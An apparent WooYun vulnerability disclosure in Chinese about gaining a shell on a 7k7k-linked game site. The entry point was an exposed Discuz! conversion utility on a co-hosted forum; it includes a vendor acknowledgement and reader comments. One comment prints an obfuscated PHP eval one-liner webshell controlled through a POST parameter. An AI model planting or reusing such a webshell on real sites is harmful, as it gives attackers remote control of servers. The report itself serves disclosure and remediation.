漏洞概要
关注数(24)
关注此漏洞
漏洞标题:奇客星空某站Getshell
漏洞作者: U神
提交时间:2014-03-10 16:43
修复时间:2014-04-24 16:43
公开时间:2014-04-24 16:43
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-03-10: 细节已通知厂商并且等待厂商处理中
2014-03-10: 厂商已经确认,细节仅向厂商公开
2014-03-20: 细节向核心白帽子及相关领域专家公开
2014-03-30: 细节向普通白帽子公开
2014-04-09: 细节向实习白帽子公开
2014-04-24: 细节向公众公开
简要描述:
详细说明:
#1.被渗透的网站是“www.youyouwin.com”,标题:游戏共赢。首先来说一下我是如何确定这个网站是奇客星空旗下的.
①.其一这个网站是个小游戏的网站,和奇客星空是干同一行的;
②.其二这个游戏的底部信息标明了7K7K.com,如图:
③.其三我们点击【京网文[2010]0375-006】备案信息打开的是奇客星空!也成功的跳转到7k的备案页。
④.其四我们通过爱站查询一下,注册邮箱完全和7k7k一样,并且该邮箱下的域名都是奇客星空的!具体的关联的域名审核员自己看下,以上四点证据足以证明是奇客星空下的分站。
#2.以上完全证述了该站为奇客星空下的,那下面说说如何找到的,通过查看7k7k.com的C段看到这个站点的。
漏洞证明:
#3.该站同服下有一个站点http://www.hanhanlv.com是Discuz!的论坛,于是闲着没事就扫一下,结果扫到了这个东西![http://www.hanhanlv.com/utility/convert/index.php] 这个东西是可以写shell的,具体详情请厂商看
放上我们的EXP,Post的地址改成http://www.hanhanlv.com/utility/convert/index.php即可,直接保存设置:
接着连接我们的一句话地址:
#4.看到我们刚才的那个站了吧~
挂个测试页证明一下
PS:数据库神马的我就不透露了,不做有违背白帽子的道德的事情!建议厂商使用完dz转换工具之后可以删除该目录,以免被骇客恶意使用侵入!第二次合作,另外感谢厂商给高分!
修复方案:
版权声明:转载请注明来源 U神@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-03-10 18:16
厂商回复:
感谢
最新状态:
暂无
漏洞评价:
评论
-
2014-03-09 08:30 |
U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)
-
2014-03-10 18:20 |
U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)
@youyouwin.com 不谢,请做好安全管理!裤子神马的没有动!请自查log,感谢您的及时确认!
-
2014-04-29 18:18 |
马丁 ( 路人 | Rank:27 漏洞数:23 | 大爷~给口饭吧。)
-
2014-05-10 15:45 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
-
2014-05-10 19:55 |
马丁 ( 路人 | Rank:27 漏洞数:23 | 大爷~给口饭吧。)
-
2014-05-10 21:51 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
-
2014-05-11 19:32 |
马丁 ( 路人 | Rank:27 漏洞数:23 | 大爷~给口饭吧。)
-
2014-05-11 19:34 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
@马丁 是啊,文本上说的,反正能菜刀连接,那密码和一句话地址在哪里!
-
2014-05-11 19:56 |
马丁 ( 路人 | Rank:27 漏洞数:23 | 大爷~给口饭吧。)
@浅兮 eval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]" value="localhost"></td> 密码在这里面 链接地址是配置文件 肯定是删掉了啊 你有什么想法?
-
2014-05-11 20:37 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )